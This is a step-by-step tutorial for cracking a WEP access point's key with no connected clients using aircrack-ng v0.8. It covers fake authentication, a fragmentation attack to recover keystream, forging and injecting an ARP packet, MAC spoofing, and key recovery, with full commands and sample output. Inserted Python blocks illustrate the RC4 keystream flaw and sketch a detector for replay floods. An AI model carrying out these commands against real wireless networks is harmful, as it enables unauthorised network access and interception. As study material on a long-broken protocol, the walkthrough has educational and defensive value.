Clientless WEP Cracking
Before Starting, Ensure:

Your hardware supports packet injection. You can verify this by using Wireshark.

You are within range of an AP. Just because you can see packets transmitted from the AP doesn't mean you can send packets to it if the distance is too great. A card's transmit power is usually lower than that of an AP.

The ap is transmitting.

The AP is using WEP with Open Authentication. If SKA (Shared Key Authentication) is being used, you must have captured the PRGA xor data previously.

You are using v0.8 of aircrack-ng. Other versions may need different command variations.

Equipment used:
MAC of card doing the injecting: 00:11:22:33:44
BSSID (AP's MAC): 13:13:13:13:13
ESSID (Wireless network name): TEST
Access point channel: 9
Wireless interface: rausb0

Solution Overview

Here are the basic steps we will be going through:
1 - Start wireless interface on monitor mode on correct channel
2 - Fake authenticate using aireplay-ng with the -1 option
3 - Initiate a fragmentation attack to obtain a PRGA
4 - Use packetforge-ng to make an arp packet using the PRGA previously obtained
5 - Use airodump-ng to capture IVs
6 - Inject the arp packet created by packetforge-ng in step 4
7 - Run aircrack-ng/ptw to crack WEP key

Step 1 - Start the wireless interface in monitor mode on AP channel

Enter the following command to start the wireless card on channel 9 in monitor mode:
airmon-ng start rausb0 9
Use this page if you want to convert the frequency to channel number.

Troubleshooting Tips:

If an interface other than rausb0 was started, you can use that one, or use “airmon-ng stop athX”, where X is each interface you want to stop.

Step 2 - Use aireplay-ng to do a fake authentication with the access point

An ap will not accept a packet from a MAC that is not associated with it. If the source MAC address you are injecting is not associated, the AP ignores the packet and sends out a “DeAuthentication” packet. No new IVs are created in this situation as the AP is ignoring any packets with the unassociated MAC in them.

Use aireplay-ng to fake authenticate to an AP.
aireplay-ng -1 0 -e TEST -a 13:13:13:13:13 -h 00:11:22:33:44 rausb0

-1 means fake authentication
0 is the reassociation timing in seconds
-e TEST is the wireless network name
-a 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is our card MAC address
rausb0 is the wireless interface name
Success looks like:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Or another variation for picky access points:
aireplay-ng -1 6000 -o 1 -q 10 -e TEST -a 13:13:13:13:13 -h 00:11:22:33:44 rausb0

6000 - Reauthenticate every 6000 seconds. The long period also causes keep alive packets to be sent.
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 - Send keep alive packets every 10 seconds.
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
# and so on.
Failed authentication:
18:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request

Do NOT proceed beyond this step if fake authentication is not working.

Troubleshooting Tips:
Some APs implement MAC filtering. In this case, it is necessary to know one of the MACs of any computers that use the target Access Point. Use macchanger to spoof MACs.

Step 3 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA

The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) bit file. It is not the WEP key itself, nor can it decrypt packets. However, it is used to create new packets. You can use either the chopchop or the fragmentation attack to obtain a PRGA. When one attack doesn't work against an AP, use the other one. Visit to see the pros and cons of each attack.
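The keystream property described above, shown on constructed data as an added example (not part of the original tutorial or of aircrack-ng). The RC4 and WEP helpers, the key, the IVs and the payloads are all constructed for illustration; the block shows that a recovered keystream is tied to one IV, and that the receiver's only integrity check is an unkeyed CRC-32.

```python
import zlib

def rc4(key: bytes, n: int) -> bytes:
    """First n bytes of the RC4 keystream for key."""
    s, j = list(range(256)), 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))  # truncates to the shorter input

def with_icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: unkeyed CRC-32 appended to the plaintext."""
    return plaintext + zlib.crc32(plaintext).to_bytes(4, "little")

def wep_seal(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    data = with_icv(plaintext)
    return xor(data, rc4(iv + key, len(data)))

def wep_open(iv: bytes, key: bytes, body: bytes):
    """Receiver check: plaintext if the ICV verifies, otherwise None."""
    data = xor(body, rc4(iv + key, len(body)))
    return data[:-4] if with_icv(data[:-4]) == data else None

def keystream_properties() -> dict:
    key = bytes.fromhex("0102030405")          # constructed 40-bit WEP key
    iv_a, iv_b = b"\x00\x00\x01", b"\x00\x00\x02"   # constructed IVs
    known = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + bytes(28)  # constructed ARP-like body
    ks = xor(wep_seal(iv_a, key, known), with_icv(known))    # no key involved
    other = b"frame under another IV"
    new_body = xor(with_icv(b"constructed payload"), ks)     # built without the key
    return {
        "keystream_is_rc4_output": ks == rc4(iv_a + key, len(ks)),
        "reads_other_iv": xor(wep_seal(iv_b, key, other), ks)[:-4] == other,
        "accepted_under_same_iv": wep_open(iv_a, key, new_body) == b"constructed payload",
        "accepted_under_other_iv": wep_open(iv_b, key, new_body) is not None,
    }
```

WEP never requires a fresh IV from the sender, so the "accepted under the same IV" result holds for as long as the key is in use; this is a protocol flaw and the mitigation is moving off WEP.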

Fragmentation attack:
aireplay-ng -5 -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0
-5 means the fragmentation attack
-b 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is the MAC address of our card and must match the MAC used in the fake authentication
rausb0 is the wireless interface name
The system will respond:
aireplay-ng -5 -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0
Waiting for a data packet...
Read 127 packets...

Size: 114, FromDS: 1, ToDS: 0 (WEP)

BSSID = 13:13:13:13:13
Dest. MAC = 01:00:5E:00:00:FB
Source MAC = 00:40:F4:77:E5:C9

0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@.
0x0010: 0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R....0s.e
0x0020: c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.".....A6r.).
0x0030: 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M..;
0x0040: 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX...z.+.>...O.
0x0050: 4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m....U2......
0x0060: c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(...."m.qj.
0x0070: 9c9f ..

Use this packet ? y
When a packet from the access point arrives, enter “y” to proceed. You may need to try a few to be successful.
When successful, the system responds:
Saving chosen packet in replay_src-0203-180328.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0203-180343.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Success! The file “fragment-0203-180343.xor” can then be used in the next step to generate an arp packet.
Troubleshooting Tips
Sometimes the first packet won't work. Try a few more. This goes for both attacks. Visit for more information on the chopchop attack.

Step 4 - Use packetforge-ng to create an arp packet

Use the PRGA from the last step. Look for the file ending in "xor". Packetforge-ng uses this PRGA to make an arp packet. Hopefully, when injected, the ap will rebroadcast it and a new IV can be obtained.
packetforge-ng -0 -a 13:13:13:13:13 -h 00:11:22:33:44 -k -l -y fragment-0203-180343.xor -w arp-request
-0 means generate an arp packet
-a 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is MAC address of our card
-k is the destination IP (most APs respond to
-l is the source IP (most APs respond to
-y fragment-0203-180343.xor is file to read the PRGA from
-w arp-request is name of file to write the arp packet to
The system will respond:
Wrote packet to: arp-request

Step 5 - Start airodump-ng

Open another console session to capture the generated IVs. Then enter:
airodump-ng -c 9 --bssid 13:13:13:13:13 --ivs -w capture rausb0
-c 9 is the channel for the wireless network
--bssid 13:13:13:13:13 is the access point MAC address. This eliminates extraneous traffic.
--ivs specifies that you only want to capture the IVs. This keeps the file as small as possible. (Do not use --ivs if you wish to crack using aircrack-ptw)
-w capture is file name prefix for the file which will contain the IVs.
rausb0 is the interface name.

Step 6 - Inject the arp packet

Using the console session where you generated the arp packet, enter:
aireplay-ng -2 -r arp-request rausb0
-2 means use interactive frame selection
-r arp-request defines the file name from which to read the arp packet
rausb0 defines the interface to use
The system will respond:
Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 13:13:13:13:13
Source MAC = 00:09:5B:EC:EE:F2

0x0000: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[...
0x0010: ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z...
0x0020: c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8.
0x0030: f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^
0x0040: 6ada 92f2 j...

Use this packet ? y
Enter “y” to use this packet. The system responds by showing how many packets it is injecting and reminds you to start airodump-ng if it has not already been started:
Saving chosen packet in replay_src-0204-104917.cap
You should also start airodump-ng to capture replies.

End of file.

While this command is successfully running, the airodump-ng screen will look similar to:
CH 9 ][ Elapsed: 16 s ][ 2007-02-04 11:04


13:13:13:13:13 47 100 179 2689 336 9 11 WEP WEP TEST

BSSID STATION PWR Lost Packets Probes

13:13:13:13:13 00:11:22:33:44 29 0 2707
Notice that the station packets are roughly equal to the BSSID data packets. This indicates injection is working well. The data rate of 336 packets per second is an indicator that the injection is working well.
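From the defender's side, the same pattern is visible to a monitor-mode sensor, because 802.11 headers are not encrypted under WEP. The following added example (not from the original tutorial; the record format, the thresholds and the 02:00:... MAC addresses are assumptions) flags a station whose client-to-AP broadcast frames are all one size and arrive at hundreds per one-second window.

```python
from collections import Counter, defaultdict

BROADCAST = "FF:FF:FF:FF:FF:FF"

def find_replay_floods(frames, window_ms=1000, min_frames=100, same_size=0.9):
    """frames: (ts_ms, src_mac, dst_mac, size, to_ds) tuples from a sensor,
    where dst_mac is the final destination address of the frame.
    Returns {src_mac: (peak_frames_per_window, dominant_size)} for stations
    whose client-to-AP broadcast traffic is one frame size at a high rate."""
    per_src = defaultdict(list)
    for ts, src, dst, size, to_ds in frames:
        if to_ds and dst.upper() == BROADCAST:
            per_src[src].append((ts, size))
    alerts = {}
    for src, events in per_src.items():
        events.sort()
        start = 0
        for end, (ts, _) in enumerate(events):
            # Slide the window start forward until it spans < window_ms.
            while ts - events[start][0] >= window_ms:
                start += 1
            count = end - start + 1
            if count < min_frames:
                continue
            sizes = Counter(size for _, size in events[start:end + 1])
            size, hits = sizes.most_common(1)[0]
            if hits / count >= same_size and count > alerts.get(src, (0, 0))[0]:
                alerts[src] = (count, size)
    return alerts

def sample_frames():
    """Constructed capture: one replaying station and two ordinary ones."""
    ap = "13:13:13:13:13"            # BSSID placeholder used on this page
    # 68-byte ToDS broadcast frame every 3 ms, as in the Step 6 output.
    frames = [(i * 3, "00:11:22:33:44", BROADCAST, 68, True) for i in range(600)]
    # Ordinary client: a few ARP-sized broadcasts spread over two seconds.
    frames += [(t, "02:00:00:00:00:01", BROADCAST, 68, True)
               for t in (5, 400, 900, 1500)]
    # Busy client doing unicast transfers of varying size: not broadcast.
    frames += [(i * 4, "02:00:00:00:00:02", ap, 200 + i % 900, True)
               for i in range(450)]
    return frames

if __name__ == "__main__":
    for mac, (peak, size) in find_replay_floods(sample_frames()).items():
        print(f"{mac}: {peak} broadcast frames/s, all about {size} bytes")
```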

Step 7 - Run aircrack-ng to obtain the WEP key

Start another console session and enter:
aircrack-ng *.ivs -b 13:13:13:13:13
*.ivs selects all files ending in “ivs”.
-b 13:13:13:13:13 selects the one access point we are interested in

You can run this while generating packets. Before long, the WEP key will be calculated and displayed. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. These are approximations. You may need more or less.

Troubleshooting Tips:
Sometimes you need to try various techniques to crack the WEP key. Try “-n” to set various key lengths. Use “-f” and try various fudge factors. Use “-k” and try disabling various korek methods.
(For Aircrack-ptw) enter:
aircrack-ng -z *.cap -b 13:13:13:13:13
Aircrack-ptw is specified by using the “-z” switch to the aircrack-ng command. Also, ptw can only use .cap files.
Aircrack-ptw uses a different algorithm and cracks keys with a fraction of the data necessary. I've cracked 128 bit WEP with only 25k ivs.

Alternate Solution:
Here is a way that basically takes any packet broadcast by the access point and converts it to a broadcast packet so that the AP generates a new IV.

The con to this technique is that if you receive a 1000 byte packet you then rebroadcast 1000 bytes. This can slow down the packet/sec rate substantially. The pro to this is that this process is simple. If you're lucky, you will get a small packet for rebroadcasting. With a small packet, this solution is comparable to the aforementioned process.

As always, fake authenticate first.
Enter the following command:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0
-2 means use interactive frame selection
-p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.
-c FF:FF:FF:FF:FF:FF sets the destination MAC address to be a broadcast. This is required to cause the AP to replay the packet, thus generating the new IV.
-b 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is the MAC address of our card and must match the MAC used in the fake authentication
rausb0 defines the interface to use
The system will respond:
Read 698 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 13:13:13:13:13
Source MAC = 00:D0:CF:03:34:8C

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.*
0x0020: 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#..
0x0030: ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_......
0x0040: 1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg....
0x0050: f043 09f6 5418 .C..T.

Use this packet ? y
You enter “y” to select the packet and start injecting it. Remember, the smaller the packet, the better. You then start injecting:
Saving chosen packet in replay_src-0411-145110.cap

Sent 10204 packets...(455 pps)

If you have not already started airodump-ng, be sure to start it now. Once you have sufficient IVs, you can start aircrack-ng and attempt to crack the WEP key.

Another variation of this attack is to use packets from a previous capture. You must have captured the full packets, not just the IVs.
Here is what the command would look like:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13 -h 00:11:22:33:44 -r capture-01.cap rausb0
Where “-r capture-01.cap” is data from a previous capture.

